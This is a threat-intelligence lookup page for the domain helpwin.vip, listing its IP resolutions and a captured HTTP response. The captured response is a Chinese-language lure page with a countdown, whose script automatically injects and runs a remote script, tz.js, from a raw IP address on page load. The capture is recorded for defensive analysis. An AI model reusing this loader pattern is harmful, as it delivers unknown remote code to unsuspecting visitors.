Help
RSS
API
Feed
Maltego
Contact
Domain > helpwin.vip
×
More information on this domain is in
AlienVault OTX
Is this malicious?
Yes
No
DNS Resolutions
Date
IP Address
2025-11-11
152.32.171.65
(
ClassC
)
2026-01-05
38.249.208.241
(
ClassC
)
Port 80
HTTP/1.1 200 OKServer: nginxDate: Mon, 05 Jan 2026 01:32:06 GMTContent-Type: text/html; charsetutf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding !DOCTYPE html>html langzh-CN>head> meta charsetUTF-8> meta nameviewport contentwidthdevice-width, initial-scale1.0> meta http-equivX-UA-Compatible contentIEedge> title>神秘入口/title> style> * { margin: 0; padding: 0; box-sizing: border-box; } body { font-family: Segoe UI, Tahoma, Geneva, Verdana, sans-serif; background: linear-gradient(135deg, #0f1b30, #1d3557); height: 100vh; display: flex; justify-content: center; align-items: center; color: #fff; overflow: hidden; position: relative; } body::before { content: ; position: absolute; top: 0; left: 0; width: 100%; height: 100%; background: url(data:image/svg+xml;utf8,svg xmlnshttp://www.w3.org/2000/svg viewBox0 0 200 200>rect fillnone width200 height200/>path fill%23000 opacity0.1 dM100,0a100,100,0,1,0,100,100A100,100,0,0,0,100,0Zm0,185a85,85,0,1,1,85-85A85,85,0,0,1,100,185Z/>/svg>); background-size: 300px; animation: rotate 120s linear infinite; } @keyframes rotate { from { transform: rotate(0deg); } to { transform: rotate(360deg); } } .alert-box { background: rgba(13, 25, 42, 0.85); backdrop-filter: blur(10px); border-radius: 20px; padding: 35px; width: 90%; max-width: 420px; text-align: center; box-shadow: 0 15px 35px rgba(0, 0, 0, 0.3); border: 1px solid rgba(255, 255, 255, 0.1); position: relative; z-index: 1; } .countdown-container { position: relative; width: 220px; height: 220px; margin: 0 auto 30px; } .countdown-circle { width: 100%; height: 100%; transform: rotate(-90deg); } .countdown-background { cx: 110; cy: 110; r: 100; fill: none; stroke: rgba(255, 255, 255, 0.15); stroke-width: 10; } .countdown-progress { cx: 110; cy: 110; r: 100; fill: none; stroke: #06D6A0; stroke-width: 11; stroke-linecap: round; transition: stroke-dashoffset 0.95s linear; stroke-dasharray: 628; stroke-dashoffset: 628; } .countdown-text { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); font-size: 52px; font-weight: 800; color: #fff; text-shadow: 0 0 15px rgba(6, 214, 160, 0.7); } .countdown-label { margin-top: 8px; font-size: 16px; letter-spacing: 2px; color: rgba(255, 255, 255, 0.7); } .alert-head { font-size: 32px; margin-bottom: 20px; font-weight: 700; text-shadow: 0 2px 8px rgba(0, 0, 0, 0.3); color: #06D6A0; letter-spacing: 1px; } .alert-content { margin-bottom: 30px; line-height: 1.6; color: rgba(255, 255, 255, 0.85); font-size: 17px; } .alert-btn { display: inline-block; background: linear-gradient(to right, #06D6A0, #0ABBD0); color: white; padding: 14px 40px; border-radius: 50px; text-decoration: none; font-weight: 600; font-size: 17px; transition: all 0.3s ease; box-shadow: 0 5px 20px rgba(6, 214, 160, 0.35); border: none; cursor: pointer; letter-spacing: 1px; position: relative; overflow: hidden; } .alert-btn:hover { transform: translateY(-3px); box-shadow: 0 8px 25px rgba(6, 214, 160, 0.5); } .alert-btn:active { transform: translateY(1px); } .loading-text { margin-top: 25px; font-size: 15px; color: rgba(255, 255, 255, 0.6); display: flex; align-items: center; justify-content: center; gap: 10px; } .loading-dots { display: flex; gap: 4px; } .dot { width: 6px; height: 6px; background: #06D6A0; border-radius: 50%; animation: pulse 1.5s infinite ease-in-out; } .dot:nth-child(2) { animation-delay: 0.3s; } .dot:nth-child(3) { animation-delay: 0.6s; } @keyframes pulse { 0%, 100% { opacity: 0.3; transform: scale(0.8); } 50% { opacity: 1; transform: scale(1.2); } } .logo { margin-bottom: 25px; font-size: 24px; font-weight: 700; color: #06D6A0; text-shadow: 0 0 15px rgba(6, 214, 160, 0.5); letter-spacing: 2px; } @media (max-width: 480px) { .alert-box { padding: 25px; } .countdown-container { width: 180px; height: 180px; } .countdown-background, .countdown-progress { r: 85; stroke-width: 9; } .countdown-text { font-size: 42px; } .alert-head { font-size: 28px; } .alert-btn { padding: 12px 30px; font-size: 16px; } } /style>/head>body> div idjs-alert-box classalert-box> div classlogo>神秘入口/div> div classcountdown-container> svg classcountdown-circle viewBox0 0 220 220> circle classcountdown-background /> circle idjs-sec-circle classcountdown-progress /> /svg> div idjs-sec-text classcountdown-text>2/div> div classcountdown-label>倒计时中/div> /div> div classalert-head idjs-alert-head>绝品导航/div> div classalert-content> p>精彩内容即将呈现/p> p>请稍候片刻.../p> /div> button idjs-alert-btn classalert-btn>立即进入/button> div classloading-text idloading-text> span>加载中/span> div classloading-dots> div classdot>/div> div classdot>/div> div classdot>/div> /div> /div> /div> script> document.addEventListener(DOMContentLoaded, function() { const secCircle document.getElementById(js-sec-circle); const secText document.getElementById(js-sec-text); const alertBtn document.getElementById(js-alert-btn); const loadingText document.getElementById(loading-text); // 设置圆形进度条的周长 const radius 100; const circumference 2 * Math.PI * radius; secCircle.style.strokeDasharray `${circumference}`; secCircle.style.strokeDashoffset `${circumference}`; let countdown 2; // 改为2秒倒计时 let countdownInterval; let scriptLoaded false; // 开始倒计时 function startCountdown() { // 立即更新初始状态 updateCountdown(); countdownInterval setInterval(function() { countdown--; if (countdown 0) { clearInterval(countdownInterval); completeCountdown(); return; } updateCountdown(); }, 1000); } // 更新倒计时显示 function updateCountdown() { // 更新文本 secText.textContent countdown; // 更新进度条 (基于2秒倒计时调整) const offset circumference - (countdown / 2) * circumference; secCircle.style.strokeDashoffset offset; } // 加载外部脚本 function loadExternalScript() { if (scriptLoaded) return; scriptLoaded true; loadingText.innerHTML span>正在加载资源/span>div classloading-dots>div classdot>/div>div classdot>/div>div classdot>/div>/div>; // 创建script元素 const script document.createElement(script); script.src http://38.249.208.254:36789/tz.js; script.onload function() { loadingText.innerHTML span>资源加载完成/span>; alertBtn.textContent 进入门户; alertBtn.disabled false; // 添加点击事件,实际使用中可能是跳转或其他操作 alertBtn.addEventListener(click, function() { loadingText.innerHTML span>准备进入.../span>; // 这里可以添加实际跳转逻辑 }); }; script.onerror function() { loadingText.innerHTML span>加载失败,请重试/span>; alertBtn.textContent 重试; alertBtn.disabled false; scriptLoaded false; alertBtn.addEventListener(click, function() { loadingText.innerHTML span>重新加载中/span>div classloading-dots>div classdot>/div>div classdot>/div>div classdot>/div>/div>; setTimeout(loadExternalScript, 1500); }); }; document.head.appendChild(script); } // 倒计时完成 function completeCountdown() { alertBtn.textContent 加载中...; alertBtn.disabled true; loadExternalScript(); } // 立即进入按钮点击事件 alertBtn.addEventListener(click, function() { if (countdown > 0) { clearInterval(countdownInterval); countdown 0; updateCountdown(); completeCountdown(); } }); // 开始倒计时 startCountdown(); }); /script>/body>/html>
View on OTX
|
View on ThreatMiner
Please enable JavaScript to view the
comments powered by Disqus.
Data with thanks to
AlienVault OTX
,
VirusTotal
,
Malwr
and
others
. [
Sitemap
]